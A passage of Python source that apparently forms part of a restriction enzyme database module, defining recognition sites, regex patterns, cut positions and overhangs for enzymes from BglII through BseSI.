'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['BglII'] = _temp()
def _temp():
return {
'charac': (9, 5, None, None, 'GGATC'),
'compsite': '(?=(?P<BinI>GGATC))|(?=(?P<BinI_as>GATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 5,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BinI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCNGC'),
'compsite': '(?=(?P<BisI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BisI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'RTTAAATM'),
'compsite': '(?=(?P<BkrAM31DI>[AG]TTAAAT[AC]))|(?=(?P<BkrAM31DI_as>[GT]ATTTAA[CT]))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'RTTAAATM',
'size': 8,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BkrAM31DI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GRAGCAG'),
'compsite': '(?=(?P<Ble402II>G[AG]AGCAG))|(?=(?P<Ble402II_as>CTGCT[CT]C))',
'dna': None,
'freq': 8192.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRAGCAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ble402II'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCTAGG'),
'compsite': '(?=(?P<BlnI>CCTAGG))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTAGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('K', 'M', 'S'),
}
rest_dict['BlnI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAGGAC'),
'compsite': '(?=(?P<BloAII>GAGGAC))|(?=(?P<BloAII_as>GTCCTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGGAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BloAII'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCTNAGC'),
'compsite': '(?=(?P<BlpI>GCT.AGC))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTNAGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BlpI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GCNGC'),
'compsite': '(?=(?P<BlsI>GC.GC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCNGC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BlsI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGTACT'),
'compsite': '(?=(?P<BmcAI>AGTACT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGTACT',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BmcAI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCNGG'),
'compsite': '(?=(?P<Bme1390I>CC.GG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['Bme1390I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGWCC'),
'compsite': '(?=(?P<Bme18I>GG[AT]CC))',
'dna': None,
'freq': 512.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGWCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bme18I'] = _temp()
def _temp():
return {
'charac': (3, 0, None, None, 'C'),
'compsite': '(?=(?P<BmeDI>C))|(?=(?P<BmeDI_as>G))',
'dna': None,
'freq': 4.0,
'fst3': 0,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'C',
'size': 1,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BmeDI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'GACNNNNNGTC'),
'compsite': '(?=(?P<BmeRI>GAC.....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNNGTC',
'size': 11,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BmeRI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CYCGRG'),
'compsite': '(?=(?P<BmeT110I>C[CT]CG[AG]G))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'YCGR',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CYCGRG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['BmeT110I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CACGTC'),
'compsite': '(?=(?P<BmgBI>CACGTC))|(?=(?P<BmgBI_as>GACGTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BmgBI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GKGCCC'),
'compsite': '(?=(?P<BmgI>G[GT]GCCC))|(?=(?P<BmgI_as>GGGC[AC]C))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKGCCC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BmgI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGNCC'),
'compsite': '(?=(?P<BmgT120I>GG.CC))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNCC',
'size': 5,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['BmgT120I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'GGNNCC'),
'compsite': '(?=(?P<BmiI>GG..CC))',
'dna': None,
'freq': 256.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGNNCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BmiI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCNGG'),
'compsite': '(?=(?P<BmrFI>CC.GG))',
'dna': None,
'freq': 256.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BmrFI'] = _temp()
def _temp():
return {
'charac': (11, 4, None, None, 'ACTGGG'),
'compsite': '(?=(?P<BmrI>ACTGGG))|(?=(?P<BmrI_as>CCCAGT))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BmrI'] = _temp()
def _temp():
return {
'charac': (10, 9, None, None, 'GCATC'),
'compsite': '(?=(?P<BmsI>GCATC))|(?=(?P<BmsI_as>GATGC))',
'dna': None,
'freq': 1024.0,
'fst3': 9,
'fst5': 10,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCATC',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BmsI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GCTAGC'),
'compsite': '(?=(?P<BmtI>GCTAGC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'CTAG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTAGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N', 'V'),
}
rest_dict['BmtI'] = _temp()
def _temp():
return {
'charac': (11, 4, None, None, 'ACTGGG'),
'compsite': '(?=(?P<BmuI>ACTGGG))|(?=(?P<BmuI_as>CCCAGT))',
'dna': None,
'freq': 4096.0,
'fst3': 4,
'fst5': 11,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['BmuI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GACNNNNGTC'),
'compsite': '(?=(?P<BoxI>GAC....GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNNGTC',
'size': 10,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BoxI'] = _temp()
def _temp():
return {
'charac': (8, 6, None, None, 'GAAGAC'),
'compsite': '(?=(?P<BpiI>GAAGAC))|(?=(?P<BpiI_as>GTCTTC))',
'dna': None,
'freq': 4096.0,
'fst3': 6,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGAC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BpiI'] = _temp()
def _temp():
return {
'charac': (-8, -24, 24, 8, 'GAGNNNNNCTC'),
'compsite': '(?=(?P<BplI>GAG.....CTC))',
'dna': None,
'freq': 4096.0,
'fst3': -24,
'fst5': -8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 5,
'ovhgseq': 'NNNNN',
'results': None,
'scd3': 8,
'scd5': 24,
'site': 'GAGNNNNNCTC',
'size': 11,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BplI'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTGGAG'),
'compsite': '(?=(?P<BpmI>CTGGAG))|(?=(?P<BpmI_as>CTCCAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'N'),
}
rest_dict['BpmI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTNAGC'),
'compsite': '(?=(?P<Bpu10I>CCT.AGC))|(?=(?P<Bpu10I_as>GCT.AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B', 'I', 'N', 'V'),
}
rest_dict['Bpu10I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GCTNAGC'),
'compsite': '(?=(?P<Bpu1102I>GCT.AGC))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCTNAGC',
'size': 7,
'substrat': 'DNA',
'suppl': ('B', 'K'),
}
rest_dict['Bpu1102I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'TTCGAA'),
'compsite': '(?=(?P<Bpu14I>TTCGAA))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TTCGAA',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bpu14I'] = _temp()
def _temp():
return {
'charac': (22, 14, None, None, 'CTTGAG'),
'compsite': '(?=(?P<BpuEI>CTTGAG))|(?=(?P<BpuEI_as>CTCAAG))',
'dna': None,
'freq': 4096.0,
'fst3': 14,
'fst5': 22,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTTGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BpuEI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCSGG'),
'compsite': '(?=(?P<BpuMI>CC[CG]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'S',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCSGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('V',),
}
rest_dict['BpuMI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<Bsa29I>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Bsa29I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'YACGTR'),
'compsite': '(?=(?P<BsaAI>[CT]ACGT[AG]))',
'dna': None,
'freq': 1024.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'YACGTR',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaAI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GATNNNNATC'),
'compsite': '(?=(?P<BsaBI>GAT....ATC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATNNNNATC',
'size': 10,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaBI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'GRCGYC'),
'compsite': '(?=(?P<BsaHI>G[AG]CG[CT]C))',
'dna': None,
'freq': 1024.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GRCGYC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaHI'] = _temp()
def _temp():
return {
'charac': (7, 5, None, None, 'GGTCTC'),
'compsite': '(?=(?P<BsaI>GGTCTC))|(?=(?P<BsaI_as>GAGACC))',
'dna': None,
'freq': 4096.0,
'fst3': 5,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'NNNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTCTC',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCNNGG'),
'compsite': '(?=(?P<BsaJI>CC..GG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CNNG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaJI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'WCCGGW'),
'compsite': '(?=(?P<BsaWI>[AT]CCGG[AT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'WCCGGW',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaWI'] = _temp()
def _temp():
return {
'charac': (-9, -23, 21, 7, 'ACNNNNNCTCC'),
'compsite': '(?=(?P<BsaXI>AC.....CTCC))|(?=(?P<BsaXI_as>GGAG.....GT))',
'dna': None,
'freq': 4096.0,
'fst3': -23,
'fst5': -9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': 7,
'scd5': 21,
'site': 'ACNNNNNCTCC',
'size': 11,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BsaXI'] = _temp()
def _temp():
return {
'charac': (27, 19, None, None, 'CAACAC'),
'compsite': '(?=(?P<BsbI>CAACAC))|(?=(?P<BsbI_as>GTGTTG))',
'dna': None,
'freq': 4096.0,
'fst3': 19,
'fst5': 27,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAACAC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BsbI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCNNNNNNNGG'),
'compsite': '(?=(?P<Bsc4I>CC.......GG))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNNNNNNGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['Bsc4I'] = _temp()
def _temp():
return {
'charac': (9, 6, None, None, 'GCATC'),
'compsite': '(?=(?P<BscAI>GCATC))|(?=(?P<BscAI_as>GATGC))',
'dna': None,
'freq': 1024.0,
'fst3': 6,
'fst5': 9,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCATC',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BscAI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CCCGT'),
'compsite': '(?=(?P<BscGI>CCCGT))|(?=(?P<BscGI_as>ACGGG))',
'dna': None,
'freq': 1024.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCCGT',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['BscGI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RCCGGY'),
'compsite': '(?=(?P<Bse118I>[AG]CCGG[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RCCGGY',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bse118I'] = _temp()
def _temp():
return {
'charac': (6, -1, None, None, 'ACTGG'),
'compsite': '(?=(?P<Bse1I>ACTGG))|(?=(?P<Bse1I_as>CCAGT))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bse1I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCTNAGG'),
'compsite': '(?=(?P<Bse21I>CCT.AGG))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'TNA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTNAGG',
'size': 7,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bse21I'] = _temp()
def _temp():
return {
'charac': (8, 0, None, None, 'GCAATG'),
'compsite': '(?=(?P<Bse3DI>GCAATG))|(?=(?P<Bse3DI_as>CATTGC))',
'dna': None,
'freq': 4096.0,
'fst3': 0,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAATG',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bse3DI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GATNNNNATC'),
'compsite': '(?=(?P<Bse8I>GAT....ATC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATNNNNATC',
'size': 10,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Bse8I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'TCCGGA'),
'compsite': '(?=(?P<BseAI>TCCGGA))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CCGG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'TCCGGA',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['BseAI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'CCWGG'),
'compsite': '(?=(?P<BseBI>CC[AT]GG))',
'dna': None,
'freq': 512.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'W',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCWGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['BseBI'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'ATCGAT'),
'compsite': '(?=(?P<BseCI>ATCGAT))',
'dna': None,
'freq': 4096.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ATCGAT',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['BseCI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCNNGG'),
'compsite': '(?=(?P<BseDI>CC..GG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CNNG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNGG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseDI'] = _temp()
def _temp():
return {
'charac': (7, 0, None, None, 'GGATG'),
'compsite': '(?=(?P<BseGI>GGATG))|(?=(?P<BseGI_as>CATCC))',
'dna': None,
'freq': 1024.0,
'fst3': 0,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGATG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseGI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GATNNNNATC'),
'compsite': '(?=(?P<BseJI>GAT....ATC))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATNNNNATC',
'size': 10,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseJI'] = _temp()
def _temp():
return {
'charac': (7, -7, None, None, 'CCNNNNNNNGG'),
'compsite': '(?=(?P<BseLI>CC.......GG))',
'dna': None,
'freq': 256.0,
'fst3': -7,
'fst5': 7,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCNNNNNNNGG',
'size': 11,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseLI'] = _temp()
def _temp():
return {
'charac': (8, 0, None, None, 'GCAATG'),
'compsite': '(?=(?P<BseMI>GCAATG))|(?=(?P<BseMI_as>CATTGC))',
'dna': None,
'freq': 4096.0,
'fst3': 0,
'fst5': 8,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCAATG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseMI'] = _temp()
def _temp():
return {
'charac': (15, 8, None, None, 'CTCAG'),
'compsite': '(?=(?P<BseMII>CTCAG))|(?=(?P<BseMII_as>CTGAG))',
'dna': None,
'freq': 1024.0,
'fst3': 8,
'fst5': 15,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTCAG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseMII'] = _temp()
def _temp():
return {
'charac': (6, -1, None, None, 'ACTGG'),
'compsite': '(?=(?P<BseNI>ACTGG))|(?=(?P<BseNI_as>CCAGT))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'GN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'ACTGG',
'size': 5,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseNI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGCGC'),
'compsite': '(?=(?P<BsePI>GCGCGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGCGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['BsePI'] = _temp()
def _temp():
return {
'charac': (16, 8, None, None, 'GAGGAG'),
'compsite': '(?=(?P<BseRI>GAGGAG))|(?=(?P<BseRI_as>CTCCTC))',
'dna': None,
'freq': 4096.0,
'fst3': 8,
'fst5': 16,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'NN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAGGAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('N',),
}
rest_dict['BseRI'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'GKGCMC'),
'compsite': '(?=(?P<BseSI>G[GT]GC[AC]C))',
'dna': None,
'freq': 1024.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'KGCM',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GKGCMC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['BseSI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CGGCCG'),
